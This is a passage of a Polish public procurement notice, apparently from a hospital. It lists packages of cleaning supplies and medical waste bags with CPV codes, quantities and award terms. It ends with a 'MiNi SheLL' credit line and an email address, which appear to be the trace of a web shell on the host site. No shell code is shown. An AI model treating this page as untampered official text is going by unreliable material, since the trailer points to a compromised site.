6.	Szczotka do mycia butelek o wąskich szyjkach ze sztywnego włosia i spręzystm mocowaniem.	39224300-1	szt	30						
7.	Wycieraczka wewnętrzna, podgumowana typu FINKA o wymiarach 60x90 cm	39532000-0	szt	10						
8.	Wycieraczka wewnętrzna, podgumowana typu FINKA o wymiarach 90x260cm	39532000-0	szt	1						
9.	Wycieraczki wewnętrzne, podgumowane,czarne, typu FINKA o wymiarach 90x150cm	39532000-0	szt	5						
10.	Gąbka do kąpieli typu Tęcza o wymiarach 108/108/45	39224320-7	szt	100						
11.	Miotła typu SORGO	39224100-9	szt	7						
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.40-3, 39.22.43.10-4, 39.22.41.00-9, 39.29.00.00-1, 39.53.20.00-0, 39.22.43.00-1, 39.22.43.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.PAKIET III 
PADY, MOPY,
ŚCIERECZKI										
Lp	Nazwa towaru 	Kod CPV	J.m.	Ilość jednostek miary	Cena jed.netto za j.m.	Stawka VAT %	Wartość netto w złotych	VAT w PLN	Wartość brutto w złotych	Nazwa środka/Producent
1.	Uniwersalny kij teleskopowy, konstrukcji 100-180cm, rączka w kolorze niebieskim z obrączkami kolorystycznymi, na końcu kija gumowa obręcz antyposlizgowa.		szt	10						
2.	Pad biały poliestrowy do polerki Taski Ergo Disc 1200. Wymiary 505mm x85mm		szt	5						
3.	Pad poliestrowy do szorowarki Taski Ergo Disc 165. Wymiary 432mm x85 mm. Czarny 5szt,zielony 5szt, czerwony 4szt.		szt	14						
4.	Mop tkany, kieszeniowo - taśmowy o wysokiej zdolności czyszczącej, trójskładnikowa kombinacja mopa; biały -mikrofaza, szary - poliester, beżowy - bawełna/wiskoza. Wszyte lamelki do kodowania kolorystycznego stref czystości.Na wewnętrznej stronie mopa nadruk 5WSzK. Wysokośc nadruku 3 cm.		szt	1000						
5.	Ściereczka do kurzu w roli , koloru niebieskiego. Opakowanie rolka, 110 ściereczek	39525100-9	rolka	3						
6.	Ścierka mikrofazowa o wymiarach 40x40cm, gramatura 170 gr m2, koloru niebieskiego.Nadruk na ściereczce 5 WSzK. Wysokośc 3 cm	39525800-6	szt	250						
7.	Ścierka mikrofazowa o wymiarach 40x40cm, gramatura 170 gr m2, koloru żółtego.Nadruk na ściereczce 5 WSzK. Wysokośc 3 cm	39525800-6	szt	200						
8.	Ścierka mikrofazowa o wymiarach 40x40cm, gramatura 170 gr m2, koloru czerwonego.Nadruk na ściereczce 5 WSzK. Wysokośc 3 cm	39525800-6	szt	150						
9.	Ścierka mikrofazowa o wymiarach 40x40cm, gramatura 170 gr m2, koloru zielonego.Nadruk na ściereczce 5 WSzK. Wysokośc 3 cm	39525600-4	szt	100						
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.52.51.00-9, 39.52.58.00-6, 39.52.56.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET IV - WORKI NA ODPADY										
Lp	Nazwa towaru 	Kod CPV	J.m.	Ilość jednostek miary	Cena jed.netto za j.m.	Stawka VAT %	Wartość netto w złotych	VAT w PLN	Wartość brutto w złotych		Nazwa środka/Producent
1.	Worki jednorazowego użycia na odpady medyczne z folii polietylenowej, ,nieprzezroczyste czerwone.Grubość - 0,07 mm, wym.600mm x1200mm. 1 rolka 25 szt. Zgrzewka -10 rolek.	18930000-7	rolka	2000	10,00						
2.	Worki jednorazowego użycia na odpady medyczne z folii polietylenowej, nieprzezroczyste, czerwone, grubość 0,05 mm, wym. 500mm x 600 mm . 1 rolka 25 szt. Zgrzewka -20 rolek	18930000-7	rolka	1850	5,00						
3.	Worki jednorazowego użycia na odpady medyczne z folii polietylenowej, nieprzezroczyste, niebieskie. Grubość 0,05 mm, wym. 500mm x 600 mm . 1 rolka - 25 szt.Zgrzewka - 20 rolek	18930000-7	rolka	2080	5,00						
4.	Worki jednorazowego użycia na odpady medyczne z folii polietylenowej, nieprzezroczyste niebieskie.Grubość; 0,07mm,wym.600mm x 1200mm. 1 rolka -25 szt. Zgrzewka 10 rolek.	18930000-7	rolka	2160	10,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.93.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 22.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com